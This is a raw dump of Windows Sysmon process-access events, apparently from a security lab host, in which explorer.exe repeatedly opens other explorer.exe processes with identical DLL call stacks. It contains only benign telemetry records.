16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 